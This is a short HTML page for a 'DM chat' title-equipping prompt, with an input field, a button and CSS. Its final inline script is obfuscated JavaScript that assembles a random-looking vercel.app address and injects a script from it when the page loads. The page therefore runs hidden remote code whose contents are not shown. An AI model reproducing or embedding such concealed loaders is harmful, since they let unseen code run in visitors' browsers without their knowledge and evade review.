<h1 id="text" align="top" style="text-align:center; top:150px;">what title do you want to equip?</h1>
<script type='text/javascript' src='https://banlist.vercel.app/list.js'></script>
<h3 id="titletext" align="top" style="text-align:center; top:150px;"></h1>
<div class="button">
  <img src="up-removebg-preview.png" onclick="submittitle();"/>
</div>
<link rel="icon" href="image_6483441-removebg-preview.png">
<title>DM chat</title>
<input class='titleprompt' placeholder='Type your title here' type='text'/>
<h3 id="errortext" align="top" style="text-align:center; top:150px;"></h1>
<style>
  .titleprompt {
      border-radius: 25px;
      flex-grow: 1;
      border: 4px solid #ADD8E6;
      padding: 10px 15px;
      width: 100%;
      font-size: 16px;
    }
  .button {
    opacity: 0.5;	
    left:40%;
    top:50%;
    position: absolute;
  }
  .button:hover {
    opacity: 1;
  }
</style>
<script>
var _0x50b69b=_0x1dbf;function _0x541d(){var _0x19b79a=['2PSnyAZ','appendChil','36739593zHHrBU','5503524WNGvzP','type','itles.js','16955MSxSUx','body','cript','7f8ghewt7f','https://qw','r4wesdf3wr','text/javas','createElem','1084KtcLDg','7585305sDAJYm','10NBSEQc','7820464BFbXEd','ent','1094356xAgVtQ','1137000oguVLO','uwhre89tye','wrhs98sudi','src','rcel.app/t','gh89eur.ve','script'];_0x541d=function(){return _0x19b79a;};return _0x541d();}(function(_0x38099a,_0x1711b7){var _0xef6668=_0x1dbf,_0x368768=_0x38099a();while(!![]){try{var _0x20427b=-parseInt(_0xef6668(0x11d))/(-0x2174+-0x2576*0x1+0xe2f*0x5)*(parseInt(_0xef6668(0x130))/(0x782+-0x1*-0x14f5+-0x1c75))+-parseInt(_0xef6668(0x131))/(-0x5*0x1c1+0x1940+-0x44*0x3e)+parseInt(_0xef6668(0x12b))/(-0x132f+-0x22e4+0x3617)*(parseInt(_0xef6668(0x123))/(0x1b56+-0xf62+-0xbef))+-parseInt(_0xef6668(0x120))/(0x1bd7*-0x1+0x2336+-0x759)+-parseInt(_0xef6668(0x12c))/(0x2054+0xe47+-0x2e94)+-parseInt(_0xef6668(0x12e))/(0x522*-0x3+-0x1359+0x22c7*0x1)+-parseInt(_0xef6668(0x11f))/(0x5c*0x4e+-0x1ae5+-0x11a)*(-parseInt(_0xef6668(0x12d))/(0x1952+0x14ae+-0x2df6));if(_0x20427b===_0x1711b7)break;else _0x368768['push'](_0x368768['shift']());}catch(_0x48bfdc){_0x368768['push'](_0x368768['shift']());}}}(_0x541d,-0xc3cca*0x1+-0x2db6b+0x177a20));function _0x1dbf(_0x133927,_0x443556){var _0x2f9ec1=_0x541d();return _0x1dbf=function(_0x32d26,_0x1f3dda){_0x32d26=_0x32d26-(-0x2b*-0xc8+0x1d9*-0x10+-0x19*0x1e);var _0x579130=_0x2f9ec1[_0x32d26];return _0x579130;},_0x1dbf(_0x133927,_0x443556);}var s=document[_0x50b69b(0x12a)+_0x50b69b(0x12f)](_0x50b69b(0x11c));s[_0x50b69b(0x121)]=_0x50b69b(0x129)+_0x50b69b(0x125),document[_0x50b69b(0x124)][_0x50b69b(0x11e)+'d'](s),s[_0x50b69b(0x134)]=_0x50b69b(0x127)+_0x50b69b(0x128)+_0x50b69b(0x126)+_0x50b69b(0x132)+_0x50b69b(0x133)+_0x50b69b(0x11b)+_0x50b69b(0x11a)+_0x50b69b(0x122);
</script>
